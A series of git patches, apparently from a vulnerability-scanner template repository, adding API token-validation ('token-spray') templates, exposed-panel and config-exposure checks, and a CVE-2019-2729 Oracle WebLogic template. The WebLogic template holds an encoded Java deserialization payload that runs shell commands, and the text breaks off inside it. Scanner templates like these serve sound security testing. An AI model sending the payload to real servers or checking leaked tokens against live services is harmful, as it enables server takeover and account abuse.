2cbb1f4e69..dcbf5b156d 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/loqate.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,loqate +self-contained: true requests: - method: GET path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml index 840ab656f4..d25870e279 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/mailchimp.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mailchimp +self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" @@ -14,7 +15,6 @@ network: host: - "tls://smtp.mandrillapp.com:465" - self-contained: true matchers: - type: word words: diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml index 67d7c356bd..c4997aaaa4 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/mailgun.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mailgun +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml index 5e68a1ec4b..1e246f783b 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/mapbox.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,mapbox +self-contained: true requests: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml index a0b6cddb77..ca570964e4 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/nerdgraph.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,newrelic,nerdgraph +self-contained: true requests: - method: POST path: @@ -16,7 +17,6 @@ requests: API-Key: "{{token}}" body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml index 6105c678db..fb0ef0b6b7 100644 --- a/token-spray/npm.yaml +++ b/token-spray/npm.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,node,npm,package,manager +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml index 4c32828a44..916936aa97 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/openweather.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,weather,openweather +self-contained: true requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml index 48756e267e..bad59948ed 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/pagerduty.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pagerduty +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml index 5a46a542a8..66cd885dc6 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/pendo.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pendo +self-contained: true requests: - method: GET path: @@ -16,7 +17,6 @@ requests: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml index 29e6e32c56..d7a74ded66 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/pivotaltracker.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pivotaltracker +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-TrackerToken: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml index 72480a7efc..85367b5c61 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/postmark.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,postmark +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Accept: application/json X-Postmark-Server-Token: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml index b84a41a488..d9330371f1 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/sendgrid.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,sendgrid +self-contained: true network: - inputs: - data: "ehlo\r\n" @@ -16,7 +17,6 @@ network: host: - "tls://smtp.sendgrid.net:465" - self-contained: true matchers: - type: word words: diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml index e9e2a0af1e..8203aa56b5 100644 --- a/token-spray/slack.yaml +++ b/token-spray/slack.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,slack +self-contained: true requests: - method: POST path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml index 9ca1db987c..aed9d1760f 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/sonarcloud.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,sonarcloud +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml index 7cb306b924..01f1d80084 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/spotify.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,spotify +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/square.yaml b/token-spray/square.yaml index 2a5f7210fb..7ccb835189 100644 --- a/token-spray/square.yaml +++ b/token-spray/square.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,square +self-contained: true requests: - method: GET path: @@ -16,7 +17,6 @@ requests: Content-Type: application/json Authorization: Bearer {{token}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml index 15dd931744..50e8979aa7 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/stripe.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml index 44598c428a..357fb1bdbf 100644 --- a/token-spray/tinypng.yaml +++ b/token-spray/tinypng.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,tinypng +self-contained: true requests: - method: POST path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} - self-contained: true matchers: - type: word part: header diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml index c17c49290f..3b43f9e529 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/travisci.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,travis +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Travis-API-Version: 3 Authorization: token {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml index 9657045185..ec654b2782 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/twitter.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,twitter +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml index d7d6c6b836..e7c0a0a2f8 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/visualstudio.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,visualstudio,microsoft +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Content-Type: application/json X-Api-Token: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml index c54d184fc1..7237446fce 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/wakatime.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,wakatime +self-contained: true requests: - method: GET path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml index 79ddab793f..37e6b647ef 100644 --- a/token-spray/weglot.yaml +++ b/token-spray/weglot.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,weglot +self-contained: true requests: - method: POST path: @@ -15,7 +16,6 @@ requests: Content-Type: application/json body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml index 1546808ea7..8c1384579b 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/youtube.yaml @@ -7,18 +7,19 @@ info: severity: info tags: token-spray,youtube +self-contained: true requests: - method: GET path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - matchers-condition: or - self-contained: true + matchers-condition: or matchers: - type: word part: body words: - 'quotaExceeded' + - type: status status: - 200 From 0d59819a8a97c398b04ec4cc148f141fedbc4db2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 20 Oct 2021 14:17:32 +0530 Subject: [PATCH 3047/4083] misc update --- token-spray/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/README.md b/token-spray/README.md index e49667d4b7..4c463e5694 100644 --- a/token-spray/README.md +++ b/token-spray/README.md @@ -4,7 +4,7 @@ This directory holds templates that have static API URL endpoints. Use these to ## Usage -**token-spray** are self-contained template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. +token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. ```console # Running token-spray templates against a single token to test From fbc0c2fb9f83aacf7a31616dbfcc455d50886bfb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Oct 2021 21:56:17 +0530 Subject: [PATCH 3048/4083] Create sql-monitor.yaml --- exposed-panels/sql-monitor.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/sql-monitor.yaml diff --git a/exposed-panels/sql-monitor.yaml b/exposed-panels/sql-monitor.yaml new file mode 100644 index 0000000000..d736a98730 --- /dev/null +++ b/exposed-panels/sql-monitor.yaml @@ -0,0 +1,23 @@ +id: sql-monitor + +info: + name: SQL Monitor + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'html:"SQL Monitor"' + +requests: + - method: GET + path: + - '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True' + + matchers-condition: and + matchers: + - type: word + words: + - '

    JavaScript needs to be enabled for SQL Monitor to work properly.

    ' + - type: status + status: + - 200 From 9b402bf91589ccfcf0c95f4a30845133fe3385d1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Oct 2021 16:28:44 +0000 Subject: [PATCH 3049/4083] Auto Generated CVE annotations [Wed Oct 20 16:28:44 UTC 2021] :robot: --- cves/2021/CVE-2021-20031.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index 97ff54f001..2dc86669e2 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20031 info: name: Sonicwall SonicOS 7.0 - Host Header Injection author: gy741 - severity: low + severity: medium description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack reference: - https://www.exploit-db.com/exploits/50414 @@ -11,6 +11,11 @@ info: metadata: google-dork: inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-20031 + cwe-id: CWE-601 requests: - raw: From 4b05583b9e3967e7dec68d4a17cecbce7c78ad03 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Oct 2021 21:59:02 +0530 Subject: [PATCH 3050/4083] Create alienvault-usm.yaml --- exposed-panels/alienvault-usm.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/alienvault-usm.yaml diff --git a/exposed-panels/alienvault-usm.yaml b/exposed-panels/alienvault-usm.yaml new file mode 100644 index 0000000000..e9d7abbcf2 --- /dev/null +++ b/exposed-panels/alienvault-usm.yaml @@ -0,0 +1,23 @@ +id: alienVault-usm + +info: + name: AlienVault USM + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'http.title:"AlienVault USM"' + +requests: + - method: GET + path: + - '{{BaseURL}}/ossim/session/login.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'AlienVault USM' + - type: status + status: + - 200 From 7cbafb05a478297aa57a743f30e57e89b8c4dd95 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 20 Oct 2021 22:14:04 +0530 Subject: [PATCH 3051/4083] Create exsi-system.yaml --- exposed-panels/exsi-system.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/exsi-system.yaml diff --git a/exposed-panels/exsi-system.yaml b/exposed-panels/exsi-system.yaml new file mode 100644 index 0000000000..709f85f239 --- /dev/null +++ b/exposed-panels/exsi-system.yaml @@ -0,0 +1,23 @@ +id: exsi-system + +info: + name: ESXi System + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'html:"esxUiApp"' + +requests: + - method: GET + path: + - '{{BaseURL}}/ui/#/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'ng-app="esxUiApp"' + - type: status + status: + - 200 From 9ded2fcccf0c311f45d45b55ccc25bbf0dc6390e Mon Sep 17 00:00:00 2001 From: Sufijen Bani <git@sbani.net> Date: Wed, 20 Oct 2021 18:28:48 +0200 Subject: [PATCH 3052/4083] Add Gruntfile Expose Test Gruntfile can include secrets or other information that helps find further vulnerabilities. --- exposures/configs/gruntfile.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/configs/gruntfile.yaml diff --git a/exposures/configs/gruntfile.yaml b/exposures/configs/gruntfile.yaml new file mode 100644 index 0000000000..bac81870cb --- /dev/null +++ b/exposures/configs/gruntfile.yaml @@ -0,0 +1,27 @@ +id: gruntfile + +info: + name: gruntfile exposure + author: sbani + severity: info + reference: https://gruntjs.com/sample-gruntfile + tags: config,exposure + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/Gruntfile.js" + - "{{BaseURL}}/Gruntfile.coffee" + + matchers-condition: and + matchers: + - type: word + words: + - "module.exports" + part: body + + - type: status + status: + - 200 From ecdb28d8265683765e71050a53c7812077cbfe28 Mon Sep 17 00:00:00 2001 From: Florian Maak <florian.maak@check24.de> Date: Wed, 20 Oct 2021 19:07:25 +0200 Subject: [PATCH 3053/4083] Add jetbrains datasource exposure check --- exposures/configs/jetbrains-datasources.yaml | 24 ++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/configs/jetbrains-datasources.yaml diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml new file mode 100644 index 0000000000..b09b7da590 --- /dev/null +++ b/exposures/configs/jetbrains-datasources.yaml @@ -0,0 +1,24 @@ +id: package-json + +info: + name: Jetbrains IDE DataSources exposure + author: FlorianMaak + severity: info + description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure. + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/dataSources.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "uuid" + part: body + + - type: status + status: + - 200 From ccc026ac704daa6dd44a19ca68cc7075033ed85d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 20 Oct 2021 13:44:17 -0500 Subject: [PATCH 3054/4083] Update github-workflows-disclosure.yaml Might expose a SNYK_TOKEN --- exposures/configs/github-workflows-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index af981920a3..e7d9ea7f28 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -36,6 +36,7 @@ requests: - "{{BaseURL}}/.github/workflows/ci-daily.yml" - "{{BaseURL}}/.github/workflows/ci-issues.yml" - "{{BaseURL}}/.github/workflows/smoosh-status.yml" + - "{{BaseURL}}/.github/workflows/snyk.yml" matchers-condition: and matchers: From 5f7519a89a838a25c473c4faa97fd0ef2d2ab0a2 Mon Sep 17 00:00:00 2001 From: martincodes <62392843+martincodes-de@users.noreply.github.com> Date: Wed, 20 Oct 2021 22:13:41 +0200 Subject: [PATCH 3055/4083] add template for .idea files with sensitive data --- .../.idea-folder-with-sensitive-files.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposures/files/.idea-folder-with-sensitive-files.yaml diff --git a/exposures/files/.idea-folder-with-sensitive-files.yaml b/exposures/files/.idea-folder-with-sensitive-files.yaml new file mode 100644 index 0000000000..123c126d92 --- /dev/null +++ b/exposures/files/.idea-folder-with-sensitive-files.yaml @@ -0,0 +1,19 @@ +id: .idea-folder-with.sensitive-files + +info: + name: Reachable or public .idea-Folder files containing sensitive data + author: martincodes-de + severity: high + description: Searches for .idea-Folder by querying the /.idea and a few other files with sensitive data endpoints + tags: phpstorm, jetbrains, .idea, sensitive data + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/httpRequests/http-requests-log.http" + - "{{BaseURL}}/.idea/deployment.xml" + - "{{BaseURL}}/.idea/workspace.xml" + matchers: + - type: status + status: + - 200 \ No newline at end of file From 5178c7e17d464074b15e0b24775030f2aaf870f1 Mon Sep 17 00:00:00 2001 From: Daniel Saxton <dsaxton@pm.me> Date: Wed, 20 Oct 2021 16:04:42 -0500 Subject: [PATCH 3056/4083] Fix case in S3 bucket detection template --- technologies/aws/aws-bucket-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/aws/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml index ad824b8670..f2d61d54f4 100644 --- a/technologies/aws/aws-bucket-service.yaml +++ b/technologies/aws/aws-bucket-service.yaml @@ -18,7 +18,7 @@ requests: - contains(tolower(all_headers), 'x-amz-bucket') - contains(tolower(all_headers), 'x-amz-request') - contains(tolower(all_headers), 'x-amz-id') - - contains(tolower(all_headers), 'AmazonS3') + - contains(tolower(all_headers), 'amazons3') part: header condition: or From 9cc075011a03ad95cb0d137523c86adff7fc6f2a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 20 Oct 2021 16:16:15 -0500 Subject: [PATCH 3057/4083] Create detect-jabber-xmpp.yaml --- network/detect-jabber-xmpp.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 network/detect-jabber-xmpp.yaml diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml new file mode 100644 index 0000000000..7dbfdd8e64 --- /dev/null +++ b/network/detect-jabber-xmpp.yaml @@ -0,0 +1,24 @@ +id: detect-jabber-xmpp + +info: + name: Detects Jabber XMPP Instance + author: geeknik + severity: info + description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence. + reference: https://datatracker.ietf.org/doc/html/rfc6120 + tags: network,jabber,xmpp + +network: + - inputs: + - data: "a\n" + + host: + - "{{Hostname}}" + - "{{Hostname}}:5222" + + matchers: + - type: word + words: + - "stream:stream xmlns:stream" + - "stream:error xmlns:stream" + condition: or From f05e7364ca06e77a080464696f1b4a4e055eba03 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 20 Oct 2021 22:40:20 +0000 Subject: [PATCH 3058/4083] Auto Generated CVE annotations [Wed Oct 20 22:40:20 UTC 2021] :robot: --- cves/2021/CVE-2021-20031.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index 97ff54f001..2dc86669e2 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20031 info: name: Sonicwall SonicOS 7.0 - Host Header Injection author: gy741 - severity: low + severity: medium description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack reference: - https://www.exploit-db.com/exploits/50414 @@ -11,6 +11,11 @@ info: metadata: google-dork: inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-20031 + cwe-id: CWE-601 requests: - raw: From 06b38542fff0920a508faca59a6225c6d68d1f07 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Thu, 21 Oct 2021 04:11:30 +0530 Subject: [PATCH 3059/4083] Update jetbrains-datasources.yaml --- exposures/configs/jetbrains-datasources.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml index b09b7da590..2be4dd0504 100644 --- a/exposures/configs/jetbrains-datasources.yaml +++ b/exposures/configs/jetbrains-datasources.yaml @@ -1,4 +1,4 @@ -id: package-json +id: jetbrains-datasource info: name: Jetbrains IDE DataSources exposure @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - "uuid" + - "DataSourceManagerImpl" part: body - type: status From cda7245de9a7a1ebd7088a9f93063df38f0201ce Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 21 Oct 2021 04:21:52 +0530 Subject: [PATCH 3060/4083] misc update --- .../{gruntfile.yaml => gruntfile-exposure.yaml} | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename exposures/configs/{gruntfile.yaml => gruntfile-exposure.yaml} (78%) diff --git a/exposures/configs/gruntfile.yaml b/exposures/configs/gruntfile-exposure.yaml similarity index 78% rename from exposures/configs/gruntfile.yaml rename to exposures/configs/gruntfile-exposure.yaml index bac81870cb..a4fddba012 100644 --- a/exposures/configs/gruntfile.yaml +++ b/exposures/configs/gruntfile-exposure.yaml @@ -1,7 +1,7 @@ -id: gruntfile +id: gruntfile-exposure info: - name: gruntfile exposure + name: Gruntfile Exposure author: sbani severity: info reference: https://gruntjs.com/sample-gruntfile @@ -9,18 +9,20 @@ info: requests: - method: GET - redirects: true - max-redirects: 3 path: - "{{BaseURL}}/Gruntfile.js" - "{{BaseURL}}/Gruntfile.coffee" + redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word + part: body + condition: and words: - "module.exports" - part: body + - "grunt" - type: status status: From 323da341b2584b5f6a82d82fbe3098dcd3b4f45c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 21 Oct 2021 05:37:30 +0530 Subject: [PATCH 3061/4083] Added CVE-2019-2729 (Oracle WebLogic RCE) --- cves/2019/CVE-2019-2729.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-2729.yaml diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml new file mode 100644 index 0000000000..b28e4ae9bf --- /dev/null +++ b/cves/2019/CVE-2019-2729.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-2729 + +info: + name: Oracle WebLogic Server Administration Console Handle RCE + author: igibanez + severity: critical + description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-2729 + tags: cve,cve2019,oracle,rce,weblogic + +requests: + - raw: + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbG